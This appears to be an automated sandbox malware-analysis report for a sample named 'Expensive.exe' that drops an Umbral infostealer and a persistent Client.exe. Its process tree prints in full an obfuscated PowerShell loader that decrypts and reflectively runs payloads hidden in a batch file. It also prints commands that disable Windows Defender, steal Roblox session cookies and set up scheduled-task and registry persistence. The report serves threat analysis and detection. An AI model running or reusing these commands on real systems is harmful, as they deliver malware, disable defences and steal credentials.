Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 16:13
Static task
static1
Behavioral task
behavioral1
Sample
Expensive.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Expensive.exe
Resource
win10v2004-20240508-en
General
-
Target
Expensive.exe
-
Size
599KB
-
MD5
65e4c0420f496abb02201df254eb87a1
-
SHA1
6efcf4be11132a32a3df5029c87d2daa466fcc1a
-
SHA256
3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44
-
SHA512
bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb
-
SSDEEP
12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x0004000000022978-64.dat family_umbral behavioral2/memory/1772-71-0x00000266F5C70000-0x00000266F5CB0000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\Sub\\Client.exe" Client.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 4900 powershell.exe 2880 powershell.exe 4856 powershell.exe 4428 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Modifies AppInit DLL entries 2 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation Expensive.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 3828 ExpensiveLauncher.exe 1772 Umbral.exe 3652 Client.exe -
Loads dropped DLL 40 IoCs
pid Process 2784 Process not Found 4344 Process not Found 1496 Process not Found 1360 Process not Found 4436 Process not Found 2324 Process not Found 676 Process not Found 2628 Process not Found 4488 Process not Found 4892 Process not Found 3964 Process not Found 4944 Process not Found 2216 Process not Found 1640 Process not Found 760 Process not Found 1508 Process not Found 2740 Process not Found 2616 Process not Found 3176 Process not Found 4544 Process not Found 4884 Process not Found 4552 Process not Found 3628 Process not Found 3352 Process not Found 1112 Process not Found 3316 Process not Found 1612 Process not Found 4464 Process not Found 4396 Process not Found 756 Process not Found 1368 Process not Found 2576 Process not Found 4020 Process not Found 3100 Process not Found 4176 Process not Found 4812 Process not Found 1512 Process not Found 1640 Process not Found 2532 Process not Found 3780 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Windows\\Sub\\WatchDog.exe" Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 36 discord.com 37 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ip-api.com -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Sub\Client.exe Client.exe File opened for modification C:\Windows\Sub\Client.exe Client.exe File opened for modification C:\Windows\Sub Client.exe File created C:\Windows\Sub\WatchDog.exe Client.exe File opened for modification C:\Windows\Sub\WatchDog.exe Client.exe File created C:\Windows\xdwd.dll Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 40 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 752 schtasks.exe 4968 schtasks.exe 1400 schtasks.exe 4416 schtasks.exe 2076 schtasks.exe 1068 schtasks.exe 2412 schtasks.exe 1508 schtasks.exe 4412 schtasks.exe 3204 schtasks.exe 3316 schtasks.exe 2628 schtasks.exe 2232 schtasks.exe 3356 schtasks.exe 612 schtasks.exe 1704 schtasks.exe 4084 schtasks.exe 4400 schtasks.exe 4416 schtasks.exe 3356 schtasks.exe 4680 schtasks.exe 3612 schtasks.exe 2480 schtasks.exe 3968 schtasks.exe 3696 schtasks.exe 4412 schtasks.exe 2536 schtasks.exe 1584 schtasks.exe 212 schtasks.exe 3932 schtasks.exe 4344 schtasks.exe 1836 schtasks.exe 2704 schtasks.exe 116 schtasks.exe 3528 schtasks.exe 1112 schtasks.exe 4656 schtasks.exe 3184 schtasks.exe 4084 schtasks.exe 3964 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1928 wmic.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\URL Protocol ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347 ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command ExpensiveLauncher.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5068 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4856 powershell.exe 4856 powershell.exe 4900 powershell.exe 4900 powershell.exe 4900 powershell.exe 4428 powershell.exe 4428 powershell.exe 1772 Umbral.exe 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe 1452 powershell.exe 1452 powershell.exe 1452 powershell.exe 4596 powershell.exe 4596 powershell.exe 4596 powershell.exe 1068 powershell.exe 1068 powershell.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe 3652 Client.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeIncreaseQuotaPrivilege 4900 powershell.exe Token: SeSecurityPrivilege 4900 powershell.exe Token: SeTakeOwnershipPrivilege 4900 powershell.exe Token: SeLoadDriverPrivilege 4900 powershell.exe Token: SeSystemProfilePrivilege 4900 powershell.exe Token: SeSystemtimePrivilege 4900 powershell.exe Token: SeProfSingleProcessPrivilege 4900 powershell.exe Token: SeIncBasePriorityPrivilege 4900 powershell.exe Token: SeCreatePagefilePrivilege 4900 powershell.exe Token: SeBackupPrivilege 4900 powershell.exe Token: SeRestorePrivilege 4900 powershell.exe Token: SeShutdownPrivilege 4900 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeSystemEnvironmentPrivilege 4900 powershell.exe Token: SeRemoteShutdownPrivilege 4900 powershell.exe Token: SeUndockPrivilege 4900 powershell.exe Token: SeManageVolumePrivilege 4900 powershell.exe Token: 33 4900 powershell.exe Token: 34 4900 powershell.exe Token: 35 4900 powershell.exe Token: 36 4900 powershell.exe Token: SeIncreaseQuotaPrivilege 4900 powershell.exe Token: SeSecurityPrivilege 4900 powershell.exe Token: SeTakeOwnershipPrivilege 4900 powershell.exe Token: SeLoadDriverPrivilege 4900 powershell.exe Token: SeSystemProfilePrivilege 4900 powershell.exe Token: SeSystemtimePrivilege 4900 powershell.exe Token: SeProfSingleProcessPrivilege 4900 powershell.exe Token: SeIncBasePriorityPrivilege 4900 powershell.exe Token: SeCreatePagefilePrivilege 4900 powershell.exe Token: SeBackupPrivilege 4900 powershell.exe Token: SeRestorePrivilege 4900 powershell.exe Token: SeShutdownPrivilege 4900 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeSystemEnvironmentPrivilege 4900 powershell.exe Token: SeRemoteShutdownPrivilege 4900 powershell.exe Token: SeUndockPrivilege 4900 powershell.exe Token: SeManageVolumePrivilege 4900 powershell.exe Token: 33 4900 powershell.exe Token: 34 4900 powershell.exe Token: 35 4900 powershell.exe Token: 36 4900 powershell.exe Token: SeIncreaseQuotaPrivilege 4900 powershell.exe Token: SeSecurityPrivilege 4900 powershell.exe Token: SeTakeOwnershipPrivilege 4900 powershell.exe Token: SeLoadDriverPrivilege 4900 powershell.exe Token: SeSystemProfilePrivilege 4900 powershell.exe Token: SeSystemtimePrivilege 4900 powershell.exe Token: SeProfSingleProcessPrivilege 4900 powershell.exe Token: SeIncBasePriorityPrivilege 4900 powershell.exe Token: SeCreatePagefilePrivilege 4900 powershell.exe Token: SeBackupPrivilege 4900 powershell.exe Token: SeRestorePrivilege 4900 powershell.exe Token: SeShutdownPrivilege 4900 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeSystemEnvironmentPrivilege 4900 powershell.exe Token: SeRemoteShutdownPrivilege 4900 powershell.exe Token: SeUndockPrivilege 4900 powershell.exe Token: SeManageVolumePrivilege 4900 powershell.exe Token: 33 4900 powershell.exe Token: 34 4900 powershell.exe Token: 35 4900 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3100 wrote to memory of 3828 3100 Expensive.exe 86 PID 3100 wrote to memory of 3828 3100 Expensive.exe 86 PID 3100 wrote to memory of 5076 3100 Expensive.exe 88 PID 3100 wrote to memory of 5076 3100 Expensive.exe 88 PID 3828 wrote to memory of 2396 3828 ExpensiveLauncher.exe 90 PID 3828 wrote to memory of 2396 3828 ExpensiveLauncher.exe 90 PID 5076 wrote to memory of 1820 5076 cmd.exe 91 PID 5076 wrote to memory of 1820 5076 cmd.exe 91 PID 1820 wrote to memory of 1512 1820 net.exe 92 PID 1820 wrote to memory of 1512 1820 net.exe 92 PID 5076 wrote to memory of 4856 5076 cmd.exe 96 PID 5076 wrote to memory of 4856 5076 cmd.exe 96 PID 4856 wrote to memory of 4900 4856 powershell.exe 100 PID 4856 wrote to memory of 4900 4856 powershell.exe 100 PID 4856 wrote to memory of 820 4856 powershell.exe 102 PID 4856 wrote to memory of 820 4856 powershell.exe 102 PID 820 wrote to memory of 4796 820 WScript.exe 103 PID 820 wrote to memory of 4796 820 WScript.exe 103 PID 4796 wrote to memory of 1400 4796 cmd.exe 105 PID 4796 wrote to memory of 1400 4796 cmd.exe 105 PID 1400 wrote to memory of 3608 1400 net.exe 106 PID 1400 wrote to memory of 3608 1400 net.exe 106 PID 4796 wrote to memory of 4428 4796 cmd.exe 107 PID 4796 wrote to memory of 4428 4796 cmd.exe 107 PID 4428 wrote to memory of 1772 4428 powershell.exe 109 PID 4428 wrote to memory of 1772 4428 powershell.exe 109 PID 4428 wrote to memory of 3652 4428 powershell.exe 110 PID 4428 wrote to memory of 3652 4428 powershell.exe 110 PID 1772 wrote to memory of 4120 1772 Umbral.exe 113 PID 1772 wrote to memory of 4120 1772 Umbral.exe 113 PID 1772 wrote to memory of 1928 1772 Umbral.exe 115 PID 1772 wrote to memory of 1928 1772 Umbral.exe 115 PID 1772 wrote to memory of 2880 1772 Umbral.exe 117 PID 1772 wrote to memory of 2880 1772 Umbral.exe 117 PID 1772 wrote to memory of 3612 1772 Umbral.exe 119 PID 1772 wrote to memory of 3612 1772 Umbral.exe 119 PID 1772 wrote to memory of 1452 1772 Umbral.exe 121 PID 1772 wrote to memory of 1452 1772 Umbral.exe 121 PID 1772 wrote to memory of 4596 1772 Umbral.exe 123 PID 1772 wrote to memory of 4596 1772 Umbral.exe 123 PID 1772 wrote to memory of 2108 1772 Umbral.exe 125 PID 1772 wrote to memory of 2108 1772 Umbral.exe 125 PID 1772 wrote to memory of 1508 1772 Umbral.exe 127 PID 1772 wrote to memory of 1508 1772 Umbral.exe 127 PID 1772 wrote to memory of 2148 1772 Umbral.exe 129 PID 1772 wrote to memory of 2148 1772 Umbral.exe 129 PID 1772 wrote to memory of 1068 1772 Umbral.exe 131 PID 1772 wrote to memory of 1068 1772 Umbral.exe 131 PID 1772 wrote to memory of 1928 1772 Umbral.exe 133 PID 1772 wrote to memory of 1928 1772 Umbral.exe 133 PID 1772 wrote to memory of 4612 1772 Umbral.exe 135 PID 1772 wrote to memory of 4612 1772 Umbral.exe 135 PID 4612 wrote to memory of 5068 4612 cmd.exe 137 PID 4612 wrote to memory of 5068 4612 cmd.exe 137 PID 3652 wrote to memory of 1712 3652 Client.exe 138 PID 3652 wrote to memory of 1712 3652 Client.exe 138 PID 1712 wrote to memory of 3612 1712 CMD.exe 140 PID 1712 wrote to memory of 3612 1712 CMD.exe 140 PID 3652 wrote to memory of 4696 3652 Client.exe 141 PID 3652 wrote to memory of 4696 3652 Client.exe 141 PID 4696 wrote to memory of 2480 4696 CMD.exe 143 PID 4696 wrote to memory of 2480 4696 CMD.exe 143 PID 3652 wrote to memory of 4544 3652 Client.exe 144 PID 3652 wrote to memory of 4544 3652 Client.exe 144 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Expensive.exe"C:\Users\Admin\AppData\Local\Temp\Expensive.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:1512
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_451_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_451.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_451.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_451.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:3608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Roaming\startup_str_451.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:4120
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"8⤵
- Views/modifies file attributes
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 28⤵PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption8⤵PID:2108
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory8⤵PID:1508
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:2148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1068
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name8⤵
- Detects videocard installed
PID:1928
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause8⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\PING.EXEping localhost9⤵
- Runs ping.exe
PID:5068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe" & exit8⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe"9⤵
- Creates scheduled task(s)
PID:3612
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2480
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST & exit8⤵PID:4544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2628
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3988
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3696
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1068
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2616
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4656
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2152
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4400
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1120
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2232
-
-
-
